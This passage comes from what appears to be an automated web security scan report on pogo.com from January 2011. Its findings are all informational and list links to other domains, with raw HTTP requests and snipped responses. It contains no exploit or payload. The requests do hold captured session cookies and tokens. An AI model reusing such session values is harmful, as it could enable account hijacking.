<li><a class="popup||800|600|yes|true" href="http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<div id="copyright-text">
           <a href="http://www.ea.com/" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('footer_ea')"><img src="/img/footer/common/ea-logo.png" alt="" width="31" height="31"/>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=250820887"></iframe>
...[SNIP]...

16.63. http://www.pogo.com/misc/advertise.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/misc/advertise.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.pogo.com/misc/advertise.jsp?pageSection=footer_advertise

The response contains the following links to other domains:

http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=2060580456
http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo
http://www.ea.com/
http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice
http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy
http://www.info.ea.com/?pageSection=footer_corpinfo
https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos

Request

GET /misc/advertise.jsp?pageSection=footer_advertise HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:58:49 GMT
Server: Apache-Coyote/1.1
Content-Length: 13093

<html>
<head>
<title>Advertise on Pogo</title>
</head>

<body topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0" bgcolor="#336600">
<div align="center">



...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<div id="copyright-text">
           <a href="http://www.ea.com/" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('footer_ea')"><img src="/img/footer/common/ea-logo.png" alt="" width="31" height="31"/>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=2060580456"></iframe>
...[SNIP]...

16.64. http://www.pogo.com/oberon/navheader.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/oberon/navheader.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.pogo.com/oberon/navheader.jsp?site=pogo&ifw=756&pageSection=header_downloads_store&ifh=210&lkey=x&top=http%3A//download-games.pogo.com/AllGames.aspx%3Frefid%3Dheadernav_fp_shopmenu&pageSection=header_downloads_store

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/downloads.pogo/category;dcopt=ist;ag=af41;g=0;tile=2;sz=728x90;ord=474944?
http://ad.doubleclick.net/adj/downloads.pogo/category;dcopt=ist;ag=af41;g=0;tile=2;sz=728x90;ord=474944?
http://ad.doubleclick.net/jump/downloads.pogo/category;dcopt=ist;ag=af41;g=0;tile=2;sz=728x90;ord=474944?
http://www.clubpogo.com/?site=pogo&pageSection=header_club
http://www.ea.com/
http://www.ea.com/hasbro
http://www.easportsactive.com/
http://www.playfish.com/
http://www.rockband.com/

Request

GET /oberon/navheader.jsp?site=pogo&ifw=756&pageSection=header_downloads_store&ifh=210&lkey=x&top=http%3A//download-games.pogo.com/AllGames.aspx%3Frefid%3Dheadernav_fp_shopmenu&pageSection=header_downloads_store HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://download-games.pogo.com/AllGames.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 01:28:45 GMT
Server: Apache-Coyote/1.1
Content-Length: 11960

<html>
<head>
<script type="text/javascript" src="/v/EFwIAQ/js/std.js"> </script>
<script type="text/javascript" src="/v/CjsBMQ/js/ad.js"> </script>
<script language="Javascript">
setWindowName(
...[SNIP]...
<li><a href="http://www.playfish.com/" id="playfish" target="_blank" onclick="OmnitureCustomLink('au_hdreapl'); return true;"><span>
...[SNIP]...
<li><a href="http://www.ea.com/" id="electronicArts" target="_blank" onclick="OmnitureCustomLink('au_hdreaea'); return true;"><span>
...[SNIP]...
<li><a href="http://www.easportsactive.com/" id="eaActive" target="_blank" onclick="OmnitureCustomLink('au_hdreaact'); return true;"><span>
...[SNIP]...
<li><a href="http://www.ea.com/hasbro" id="eaHasbro" target="_blank" onclick="OmnitureCustomLink('au_hdreahas'); return true;"><span>
...[SNIP]...
<li><a href="http://www.rockband.com/" id="rockband" target="_blank" onclick="OmnitureCustomLink('au_hdrearock'); return true;"><span>
...[SNIP]...
<li id="tn-club"><a class="navlink" href="http://www.clubpogo.com/?site=pogo&pageSection=header_club" target="_top" id="clubpogo-link"><img src="/vl/img/header/main/en_US/pogo/icon-clubPogo.png" />
...[SNIP]...
<div class="ad-border"><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/downloads.pogo/category;dcopt=ist;ag=af41;g=0;tile=2;sz=728x90;ord=474944?"></script><noscript><a href="http://ad.doubleclick.net/jump/downloads.pogo/category;dcopt=ist;ag=af41;g=0;tile=2;sz=728x90;ord=474944?" target="ad"><img src="http://ad.doubleclick.net/ad/downloads.pogo/category;dcopt=ist;ag=af41;g=0;tile=2;sz=728x90;ord=474944?" width=728 height=90 border=0 alt="Click Here!"></a>
...[SNIP]...

16.65. http://www.pogo.com/oberon/navheader.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/oberon/navheader.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.pogo.com/oberon/navheader.jsp?site=pogo&ifw=756&pageSection=header_downloads_store&ifh=210&lkey=x&top=http%3A//download-games.pogo.com/%3Frefid%3Dheadernav_fp_shopmenu

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/downloads.pogo/category;dcopt=ist;ag=af41;g=0;tile=2;sz=728x90;ord=581169?
http://ad.doubleclick.net/adj/downloads.pogo/category;dcopt=ist;ag=af41;g=0;tile=2;sz=728x90;ord=581169?
http://ad.doubleclick.net/jump/downloads.pogo/category;dcopt=ist;ag=af41;g=0;tile=2;sz=728x90;ord=581169?
http://www.clubpogo.com/?site=pogo&pageSection=header_club
http://www.ea.com/
http://www.ea.com/hasbro
http://www.easportsactive.com/
http://www.playfish.com/
http://www.rockband.com/

Request

GET /oberon/navheader.jsp?site=pogo&ifw=756&pageSection=header_downloads_store&ifh=210&lkey=x&top=http%3A//download-games.pogo.com/%3Frefid%3Dheadernav_fp_shopmenu HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://download-games.pogo.com/?refid=headernav_fp_shopmenu
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 01:28:24 GMT
Server: Apache-Coyote/1.1
Content-Length: 11936

<html>
<head>
<script type="text/javascript" src="/v/EFwIAQ/js/std.js"> </script>
<script type="text/javascript" src="/v/CjsBMQ/js/ad.js"> </script>
<script language="Javascript">
setWindowName(
...[SNIP]...
<li><a href="http://www.playfish.com/" id="playfish" target="_blank" onclick="OmnitureCustomLink('au_hdreapl'); return true;"><span>
...[SNIP]...
<li><a href="http://www.ea.com/" id="electronicArts" target="_blank" onclick="OmnitureCustomLink('au_hdreaea'); return true;"><span>
...[SNIP]...
<li><a href="http://www.easportsactive.com/" id="eaActive" target="_blank" onclick="OmnitureCustomLink('au_hdreaact'); return true;"><span>
...[SNIP]...
<li><a href="http://www.ea.com/hasbro" id="eaHasbro" target="_blank" onclick="OmnitureCustomLink('au_hdreahas'); return true;"><span>
...[SNIP]...
<li><a href="http://www.rockband.com/" id="rockband" target="_blank" onclick="OmnitureCustomLink('au_hdrearock'); return true;"><span>
...[SNIP]...
<li id="tn-club"><a class="navlink" href="http://www.clubpogo.com/?site=pogo&pageSection=header_club" target="_top" id="clubpogo-link"><img src="/vl/img/header/main/en_US/pogo/icon-clubPogo.png" />
...[SNIP]...
<div class="ad-border"><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/downloads.pogo/category;dcopt=ist;ag=af41;g=0;tile=2;sz=728x90;ord=581169?"></script><noscript><a href="http://ad.doubleclick.net/jump/downloads.pogo/category;dcopt=ist;ag=af41;g=0;tile=2;sz=728x90;ord=581169?" target="ad"><img src="http://ad.doubleclick.net/ad/downloads.pogo/category;dcopt=ist;ag=af41;g=0;tile=2;sz=728x90;ord=581169?" width=728 height=90 border=0 alt="Click Here!"></a>
...[SNIP]...

16.66. http://www.pogo.com/prize/prize.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/prize/prize.do

Issue detail

The page was loaded from a URL containing a query string:

http://www.pogo.com/prize/prize.do?pageSection=header_prizes

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/prize.pogo/prizes;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=780687?
http://ad.doubleclick.net/adj/prize.pogo/prizes;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=780687?
http://ad.doubleclick.net/jump/prize.pogo/prizes;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=780687?
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=874571381
http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo
http://www.clubpogo.com/?site=pogo&pageSection=header_club
http://www.ea.com/
http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice
http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy
http://www.ea.com/hasbro
http://www.easportsactive.com/
http://www.info.ea.com/?pageSection=footer_corpinfo
http://www.playfish.com/
http://www.rockband.com/
https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos

Request

GET /prize/prize.do?pageSection=header_prizes HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/oberon/navheader.jsp?site=pogo&ifw=756&pageSection=header_downloads_store&ifh=210&lkey=x&top=http%3A//download-games.pogo.com/AllGames.aspx%3Frefid%3Dheadernav_fp_shopmenu&pageSection=header_downloads_store
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 01:28:47 GMT
Server: Apache-Coyote/1.1
Content-Length: 28733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<li><a href="http://www.playfish.com/" id="playfish" target="_blank" onclick="OmnitureCustomLink('au_hdreapl'); return true;"><span>
...[SNIP]...
<li><a href="http://www.ea.com/" id="electronicArts" target="_blank" onclick="OmnitureCustomLink('au_hdreaea'); return true;"><span>
...[SNIP]...
<li><a href="http://www.easportsactive.com/" id="eaActive" target="_blank" onclick="OmnitureCustomLink('au_hdreaact'); return true;"><span>
...[SNIP]...
<li><a href="http://www.ea.com/hasbro" id="eaHasbro" target="_blank" onclick="OmnitureCustomLink('au_hdreahas'); return true;"><span>
...[SNIP]...
<li><a href="http://www.rockband.com/" id="rockband" target="_blank" onclick="OmnitureCustomLink('au_hdrearock'); return true;"><span>
...[SNIP]...
<li id="tn-club"><a class="navlink" href="http://www.clubpogo.com/?site=pogo&pageSection=header_club" target="_top" id="clubpogo-link"><img src="/vl/img/header/main/en_US/pogo/icon-clubPogo.png" />
...[SNIP]...
<div class="ad-border"><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/prize.pogo/prizes;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=780687?"></script><noscript><a href="http://ad.doubleclick.net/jump/prize.pogo/prizes;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=780687?" target="ad"><img src="http://ad.doubleclick.net/ad/prize.pogo/prizes;dcopt=ist;ag=af41;g=0;tile=1;sz=728x90;ord=780687?" width=728 height=90 border=0 alt="Click Here!"></a>
...[SNIP]...
<noscript><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="158" height="158">
<param name="movie" value="/img/prize/en_US/cash-giveaway.swf" />
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<div id="copyright-text">
           <a href="http://www.ea.com/" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('footer_ea')"><img src="/img/footer/common/ea-logo.png" alt="" width="31" height="31"/>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=874571381"></iframe>
...[SNIP]...

16.67. http://www.pogo.com/sitemap previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/sitemap

Issue detail

The page was loaded from a URL containing a query string:

http://www.pogo.com/sitemap?pageSection=footer_sitemap

The response contains the following links to other domains:

http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=1582274200
http://www.clubpogo.com/?site=pogo
http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo
http://www.ea.com/
http://www.ea.com/global/legal/legalnotice.jsp
http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice
http://www.ea.com/global/legal/privacy_enus.jsp
http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy
http://www.info.ea.com/
http://www.info.ea.com/?pageSection=footer_corpinfo
https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo
https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos

Request

GET /sitemap?pageSection=footer_sitemap HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:58:40 GMT
Server: Apache-Coyote/1.1
Content-Length: 56624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<li><a href="http://www.ea.com/global/legal/legalnotice.jsp" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo" rel="nofollow">Terms of Service</a>
...[SNIP]...
<li><a href="http://www.ea.com/global/legal/privacy_enus.jsp" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/" rel="nofollow">Corporate Information</a>
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo" >Sign Up for Club Pogo</a>
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<div id="copyright-text">
           <a href="http://www.ea.com/" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('footer_ea')"><img src="/img/footer/common/ea-logo.png" alt="" width="31" height="31"/>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=1582274200"></iframe>
...[SNIP]...

16.68. http://www.pogo.com/word-games previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/word-games

Issue detail

The page was loaded from a URL containing a query string:

http://www.pogo.com/word-games?pageSection=footer_word

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/word.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=63743?
http://ad.doubleclick.net/adj/word.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=63743?
http://ad.doubleclick.net/jump/word.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=63743?
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/24.png
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/35.png
http://connect.facebook.net/en_US/all.js
http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=477474448
http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo
http://www.ea.com/
http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice
http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy
http://www.ea.com/ipad
http://www.ea.com/iphone
http://www.ea.com/mobile
http://www.ea.com/platform/online-games
http://www.ea.com/platform/pc-games
http://www.ea.com/platform/ps3-games
http://www.ea.com/platform/xbox-360-games
http://www.ea.com/wii
http://www.googleadservices.com/pagead/conversion.js
http://www.googleadservices.com/pagead/conversion/1068507910/?label=IRRsCNbQ2AEQhsbA_QM&guid=ON&script=0
http://www.info.ea.com/?pageSection=footer_corpinfo
http://www.java.com/js/deployJava.js
https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos

Request

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:59:40 GMT
Server: Apache-Coyote/1.1
Content-Length: 106156

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</script>

   <script src="http://connect.facebook.net/en_US/all.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<IE:clientCaps ID='oClientCaps' />

<script src="http://www.java.com/js/deployJava.js"></script>
...[SNIP]...
</div>
       <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/word.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=63743?"></script><noscript><a href="http://ad.doubleclick.net/jump/word.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=63743?" target="ad"><img src="http://ad.doubleclick.net/ad/word.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=63743?" width=300 height=250 border=0 alt="Click Here!"></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww35-forward?site=pogo&pageSection=ag_1list19_img_ww35"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/35.png" alt="SCRABBLE Cubes" width="80" height="45" /></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww24-forward?site=pogo&pageSection=ag_1list20_img_ww24"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/24.png" alt="Word Mojo" width="80" height="45" /></a>
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<li><a href="http://www.ea.com/platform/pc-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_pcgames')">PC Games</a>
...[SNIP]...
<li><a href="http://www.ea.com/wii" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_wii')">Wii</a></li>

       <li><a href="http://www.ea.com/platform/online-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_onlinegames')">Web</a></li>

       <li><a href="http://www.ea.com/platform/xbox-360-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_xboxgames')">Xbox 360</a>
...[SNIP]...
<li><a href="http://www.ea.com/platform/ps3-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_psgames')">PS3</a></li>

       <li><a href="http://www.ea.com/iphone" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_iphone')">iPhone</a>
...[SNIP]...
<li><a href="http://www.ea.com/ipad" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_ipad')">iPad</a></li>

       <li><a href="http://www.ea.com/mobile" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_mobile')">Mobile</a>
...[SNIP]...
<div id="copyright-text">
           <a href="http://www.ea.com/" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('footer_ea')"><img src="/img/footer/common/ea-logo.png" alt="" width="31" height="31"/>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=477474448"></iframe>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1068507910/?label=IRRsCNbQ2AEQhsbA_QM&guid=ON&script=0"/>
</div>
...[SNIP]...

16.69. https://www.pogo.com/action/pogo/signin.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
